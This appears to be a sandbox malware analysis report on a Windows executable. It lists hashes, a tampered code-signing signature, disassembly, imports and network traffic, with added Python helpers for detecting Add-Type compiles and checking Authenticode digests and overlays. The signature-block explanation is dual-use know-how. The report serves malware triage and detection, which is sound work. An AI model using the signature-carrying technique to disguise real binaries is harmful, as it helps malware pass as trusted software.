                                                            Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
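The two records above are the compiler command line and compiler output that PowerShell wrote for csc.exe: a /t:library build of a .cs file in %LOCALAPPDATA%\Temp that references System.Management.Automation, System.Drawing and System.Windows.Forms, which is the shape of an Add-Type compile. The following is an added triage helper, not code from the report or from the sample, that parses such a csc.exe command line and flags the properties a detection rule would key on. The SAMPLE_CMDLINE constant is the command line shown above; the parent image passed in the usage call is assumed to be the powershell.exe that wrote the compiler output file, as the record's Process field indicates.

```python
import re

# csc.exe command line recorded in the report above, used as sample input.
SAMPLE_CMDLINE = (
    r'/t:library /utf8output /R:"System.dll" '
    r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" '
    r'/R:"System.Core.dll" '
    r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" '
    r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" '
    r'/out:"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.dll" /debug- /optimize+ /warnaserror /optimize+ '
    r'"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.0.cs"'
)

# One token = a run of unquoted chars and/or "quoted" chunks (handles spaces in quoted paths).
TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')
TEMP_RE = re.compile(r'\\AppData\\Local\\Temp\\', re.IGNORECASE)

# Referenced assemblies that deserve a second look in an ad-hoc compile (assumed list).
NOTABLE_REFS = {
    "System.Management.Automation": "PowerShell runspace access (Add-Type pattern)",
    "System.Windows.Forms": "UI / clipboard / screen access",
    "System.Drawing": "screenshot capability",
}


def parse_csc_cmdline(cmdline):
    """Split a csc.exe command line into target, output, sources and references."""
    tokens = [t.replace('"', "") for t in TOKEN_RE.findall(cmdline)]
    info = {"target": None, "out": None, "sources": [], "refs": []}
    for tok in tokens:
        low = tok.lower()
        if low.startswith(("/t:", "/target:")):
            info["target"] = tok.split(":", 1)[1]
        elif low.startswith("/out:"):
            info["out"] = tok.split(":", 1)[1]
        elif low.startswith(("/r:", "/reference:")):
            info["refs"].append(tok.split(":", 1)[1])
        elif not tok.startswith("/") and low.endswith(".cs"):
            info["sources"].append(tok)
    return info


def triage_csc(cmdline, parent_image=""):
    """Return the parsed fields plus a list of human-readable findings."""
    info = parse_csc_cmdline(cmdline)
    paths = [p for p in [info["out"], *info["sources"]] if p]
    ref_names = []
    for ref in info["refs"]:
        name = ref.split("\\")[-1]
        ref_names.append(name[:-4] if name.lower().endswith(".dll") else name)
    findings = []
    from_temp = any(TEMP_RE.search(p) for p in paths)
    if from_temp:
        findings.append("compiles from / into %LOCALAPPDATA%\\Temp")
    if info["target"] == "library" and parent_image.lower().endswith("powershell.exe"):
        findings.append("library built with a PowerShell parent (Add-Type)")
    for name in ref_names:
        if name in NOTABLE_REFS:
            findings.append(f"references {name}: {NOTABLE_REFS[name]}")
    info.update(ref_names=ref_names, from_temp=from_temp, findings=findings)
    return info


if __name__ == "__main__":
    result = triage_csc(SAMPLE_CMDLINE, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe")
    for line in result["findings"]:
        print(line)
```

The findings list is what a Sigma-style rule would encode: csc.exe with a source or /out path under \AppData\Local\Temp\ and a powershell.exe parent is the generic Add-Type signature, and the reference set tells you what the compiled helper can reach.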
                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):4.331807756485642
                                                            Encrypted:false
                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                            Malicious:false
                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):7.9896081274846615
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:e45AiBoV6X.exe
                                                            File size:6'146'615 bytes
                                                            MD5:3e6d7972822636f67ccf275ebd140188
                                                            SHA1:b0a6df78dad3b697458d9296df134900b4b33177
                                                            SHA256:483a8ed2f54ab848a850e9b97207c3ed638ddd3e9fb01d19746f5d5b12e30525
                                                            SHA512:33ddaf1be46b12f5e954ca048029937262ada1d07063dccc2bb690d11ac304c6f2617be4f2c94fcc65f78e59dfbeb4d58f53b3bec0badc39280864e8a204d5c1
                                                            SSDEEP:98304:5I+nhjqJAEi65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFJ9h4krWsT:5bnJiDOYjJlpZstQoS9Hf12VKXWb4CsG
                                                            TLSH:52563359726009F2F8B7827C8C828D0AEE3778140750D6DF43A047B55F67AE19E3BBA5
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc.....[hc...`.Qhc...g.Ihc...f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d..
                                                            Icon Hash:90cececece8e8eb0
                                                            Entrypoint:0x14000c0d0
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x668FE8D7 [Thu Jul 11 14:14:47 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:456e8615ad4320c9f54e50319a19df9c
                                                            Signature Valid:false
                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232 (0x80096010, TRUST_E_BAD_DIGEST: the hash computed over the PE does not match the digest inside the signature, so the signed bytes were changed after the Akeo Consulting signature block was produced; a signature from a known publisher that fails on digest is not evidence of that publisher having signed this file)
Not Before:29/09/2021 01:00:00
Not After:29/09/2024 00:59:59
                                                            Subject Chain
                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                            Version:3
                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
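Why a signature that "exists" still fails with TRUST_E_BAD_DIGEST: the Authenticode hash covers the whole PE except the CheckSum field, the security data directory entry and the certificate table itself, which means any bytes appended between the last section and the certificate table (the overlay) are part of the signed digest. The report's own numbers show where this sample's data lives: IMAGE_DIRECTORY_ENTRY_SECURITY is at file offset 0x5da5ef with size 0x2448, and 0x5da5ef + 0x2448 = 0x5dca37 = 6,146,615, exactly the reported file size, so the certificate table is the last thing in the file, while the six sections' raw sizes sum to only 0x40000 bytes; roughly 5.8 MB of overlay sits between them. The script below is an added illustration, not code from the report or the sample, and it builds a constructed minimal PE32+ rather than touching the analysed binary. It computes the Authenticode digest per the PE/COFF hashing rules, reports overlay size and whether the certificate table ends at EOF, and demonstrates that editing CheckSum leaves the digest untouched while appending payload before the certificate table changes it. Offsets and the hashing order are from the public PE/COFF and Authenticode specifications; build_test_pe and demo are example helpers.

```python
import hashlib
import struct

# Offsets from the PE/COFF spec. CheckSum is at optional-header offset 64 in both
# PE32 and PE32+; data directories start at 96 (PE32) or 112 (PE32+);
# IMAGE_DIRECTORY_ENTRY_SECURITY is directory index 4 and holds a FILE offset.
PE32_PLUS_MAGIC = 0x20B
SECURITY_DIR_INDEX = 4


def parse_pe(data):
    """Return the offsets the Authenticode hash needs from a PE image in memory."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dd_base = 112 if magic == PE32_PLUS_MAGIC else 96
    sec_dir_off = opt + dd_base + 8 * SECURITY_DIR_INDEX
    cert_off, cert_size = struct.unpack_from("<II", data, sec_dir_off)
    sections = []
    for i in range(num_sections):
        # Section header: SizeOfRawData at +16, PointerToRawData at +20.
        raw_size, raw_ptr = struct.unpack_from("<II", data, opt + opt_size + 40 * i + 16)
        sections.append((raw_ptr, raw_size))
    return {
        "checksum_off": opt + 64,
        "sec_dir_off": sec_dir_off,
        "size_of_headers": struct.unpack_from("<I", data, opt + 60)[0],
        "sections": sections,
        "cert_off": cert_off,
        "cert_size": cert_size,
    }


def authenticode_hash(data, algo="sha256"):
    """Hash the PE the way Authenticode does: skip CheckSum, the security
    directory entry and the certificate table; hash headers, sections in file
    order, and any overlay between the last section and the certificate table."""
    pe = parse_pe(data)
    h = hashlib.new(algo)
    h.update(data[:pe["checksum_off"]])
    h.update(data[pe["checksum_off"] + 4:pe["sec_dir_off"]])
    h.update(data[pe["sec_dir_off"] + 8:pe["size_of_headers"]])
    hashed = pe["size_of_headers"]
    for raw_ptr, raw_size in sorted(pe["sections"]):
        h.update(data[raw_ptr:raw_ptr + raw_size])
        hashed += raw_size
    extra = len(data) - hashed - pe["cert_size"]   # overlay is covered by the digest
    if extra > 0:
        h.update(data[hashed:hashed + extra])
    return h.hexdigest()


def overlay_info(data):
    """(overlay bytes after the last section excluding a trailing cert table,
    whether the certificate table ends exactly at end of file)."""
    pe = parse_pe(data)
    end_of_sections = max((p + s for p, s in pe["sections"]), default=pe["size_of_headers"])
    cert_at_tail = pe["cert_size"] > 0 and pe["cert_off"] + pe["cert_size"] == len(data)
    overlay = len(data) - end_of_sections - (pe["cert_size"] if cert_at_tail else 0)
    return overlay, cert_at_tail


def build_test_pe(overlay, cert):
    """Constructed minimal PE32+ with one 512-byte section: synthetic test data,
    not the analysed sample."""
    size_of_headers = 0x200
    section = b"\xC3" * 0x200
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    opt = bytearray(240)                                     # PE32+ optional header, 16 dirs
    struct.pack_into("<H", opt, 0, PE32_PLUS_MAGIC)
    struct.pack_into("<I", opt, 60, size_of_headers)
    struct.pack_into("<I", opt, 108, 16)                     # NumberOfRvaAndSizes
    cert_off = size_of_headers + len(section) + len(overlay)
    struct.pack_into("<II", opt, 112 + 8 * SECURITY_DIR_INDEX, cert_off, len(cert))
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, len(opt), 0x22)
    sec = bytearray(40)
    sec[:5] = b".text"
    struct.pack_into("<IIII", sec, 8, len(section), 0x1000, len(section), size_of_headers)
    headers = (dos + b"PE\0\0" + coff + opt + sec).ljust(size_of_headers, b"\0")
    return bytes(headers) + section + overlay + cert


def demo():
    """Returns (CheckSum edit keeps digest?, appended overlay keeps digest?)."""
    cert = b"\0" * 16                                        # stand-in WIN_CERTIFICATE blob
    clean = build_test_pe(b"", cert)
    signed_digest = authenticode_hash(clean)
    patched = bytearray(clean)                               # CheckSum is excluded from the hash
    struct.pack_into("<I", patched, parse_pe(clean)["checksum_off"], 0xDEADBEEF)
    stapled = build_test_pe(b"payload" * 100, cert)          # same cert, payload inserted before it
    return (authenticode_hash(bytes(patched)) == signed_digest,
            authenticode_hash(stapled) == signed_digest)


if __name__ == "__main__":
    print(demo())                                            # (True, False)
    print(overlay_info(build_test_pe(b"payload" * 100, b"\0" * 16)))
```

On a real file, verification also parses the PKCS#7 blob and compares the digest stored in it with authenticode_hash(); that part is left to the OS (WinVerifyTrust) or a library. The practical check for triage is the overlay_info() pair: a certificate table that ends at EOF behind several megabytes of overlay, combined with a digest failure, is the fingerprint of a signature block carried over from a different binary.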
Instruction (entry point disassembly; the listing decodes this x86-64 image as 32-bit code, so each leading "dec eax" is really a REX.W prefix byte 0x48: "dec eax / sub esp, 28h" is sub rsp, 28h, and "dec eax / mov eax, dword ptr [00000030h]" is the 64-bit TEB read)
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007F7448ECC90Ch
                                                            dec eax
                                                            add esp, 28h
                                                            jmp 00007F7448ECC52Fh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            call 00007F7448ECCCD8h
                                                            test eax, eax
                                                            je 00007F7448ECC6D3h
                                                            dec eax
                                                            mov eax, dword ptr [00000030h]
                                                            dec eax
                                                            mov ecx, dword ptr [eax+08h]
                                                            jmp 00007F7448ECC6B7h
                                                            dec eax
                                                            cmp ecx, eax
                                                            je 00007F7448ECC6C6h
                                                            xor eax, eax
                                                            dec eax
                                                            cmpxchg dword ptr [0003843Ch], ecx
                                                            jne 00007F7448ECC6A0h
                                                            xor al, al
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            mov al, 01h
                                                            jmp 00007F7448ECC6A9h
                                                            int3
                                                            int3
                                                            int3
                                                            dec eax
                                                            sub esp, 28h
                                                            test ecx, ecx
                                                            jne 00007F7448ECC6B9h
                                                            mov byte ptr [00038425h], 00000001h
                                                            call 00007F7448ECBE05h
                                                            call 00007F7448ECD0F0h
                                                            test al, al
                                                            jne 00007F7448ECC6B6h
                                                            xor al, al
                                                            jmp 00007F7448ECC6C6h
                                                            call 00007F7448ED9BFFh
                                                            test al, al
                                                            jne 00007F7448ECC6BBh
                                                            xor ecx, ecx
                                                            call 00007F7448ECD100h
                                                            jmp 00007F7448ECC69Ch
                                                            mov al, 01h
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            int3
                                                            int3
                                                            inc eax
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            cmp byte ptr [000383ECh], 00000000h
                                                            mov ebx, ecx
                                                            jne 00007F7448ECC719h
                                                            cmp ecx, 01h
                                                            jnbe 00007F7448ECC71Ch
                                                            call 00007F7448ECCC4Eh
                                                            test eax, eax
                                                            je 00007F7448ECC6DAh
                                                            test ebx, ebx
                                                            jne 00007F7448ECC6D6h
                                                            dec eax
                                                            lea ecx, dword ptr [000383D6h]
                                                            call 00007F7448ED99F2h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c76c | 0x78 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x49000 | 0x940 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x46000 | 0x2208 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x5da5ef | 0x2448 | (none: this entry is a file offset, and 0x5da5ef + 0x2448 equals the 6'146'615-byte file size, so the certificate table is at the very end of the file)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a000 | 0x768 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x39dc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x39c80 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2b000 | 0x450 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x29210 | 0x29400 | aca64598002ecff9eefbc96554edf015 | False | 0.5511067708333334 | data | 6.4784482217419175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x2b000 | 0x12642 | 0x12800 | b8b2005e12886bf623432f44aa9179a9 | False | 0.5245724239864865 | data | 5.7508719472021905 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x73d8 | 0xe00 | d0a288978c66419b180b35f625b6dce7 | False | 0.13532366071428573 | data | 1.8378139998458343 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x46000 | 0x2208 | 0x2400 | 74cf3ea22e0a1756984435d6f80f7da5 | False | 0.4671223958333333 | data | 5.259201915045256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x49000 | 0x940 | 0xa00 | ab2532e179b4d6b0740f2d9f6cc35b70 | False | 0.426953125 | data | 5.1261425343830815 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4a000 | 0x768 | 0x800 | 71de9271648326ec88350e903470cf3e | False | 0.5576171875 | data | 5.283119454571673 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x490a0 | 0x390 | data | | | 0.4605263157894737
RT_MANIFEST | 0x49430 | 0x50d | XML 1.0 document, ASCII text | | | 0.4694508894044857
DLL | Import
USER32.dll | CreateWindowExW, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, GetLastError, FormatMessageW, GetModuleFileNameW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetEnvironmentStringsW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, WaitForSingleObject, Sleep, GetCurrentProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 20, 2024 22:16:30.609232903 CEST | 49742 | 80 | 192.168.2.4 | 208.95.112.1
Jul 20, 2024 22:16:30.614608049 CEST | 80 | 49742 | 208.95.112.1 | 192.168.2.4
Jul 20, 2024 22:16:30.614850998 CEST | 49742 | 80 | 192.168.2.4 | 208.95.112.1
Jul 20, 2024 22:16:30.614850998 CEST | 49742 | 80 | 192.168.2.4 | 208.95.112.1
Jul 20, 2024 22:16:30.620229959 CEST | 80 | 49742 | 208.95.112.1 | 192.168.2.4
Jul 20, 2024 22:16:31.112606049 CEST | 80 | 49742 | 208.95.112.1 | 192.168.2.4
Jul 20, 2024 22:16:31.304709911 CEST | 49742 | 80 | 192.168.2.4 | 208.95.112.1
Jul 20, 2024 22:16:31.376488924 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.376574039 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.376672029 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.397763968 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.397846937 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.882910013 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.883514881 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.883578062 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.885303974 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.885533094 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.886219978 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.886359930 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.886570930 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.886570930 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.886646032 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.886742115 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.886883020 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.886948109 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887100935 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887176037 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887315989 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887356997 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887425900 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887458086 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887491941 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887511969 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887540102 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887566090 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887579918 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887607098 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887640953 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887661934 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887701988 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887722969 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887748957 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887767076 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887797117 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887829065 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887893915 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887893915 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887917042 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887937069 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.887964964 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.887984991 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.888015032 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888030052 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.888067961 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888083935 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.888109922 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888127089 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.888147116 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888171911 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888186932 CEST | 443 | 49743 | 162.159.137.232 | 192.168.2.4
Jul 20, 2024 22:16:31.888226986 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888262033 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888293982 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888333082 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888351917 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
Jul 20, 2024 22:16:31.888386965 CEST | 49743 | 443 | 192.168.2.4 | 162.159.137.232
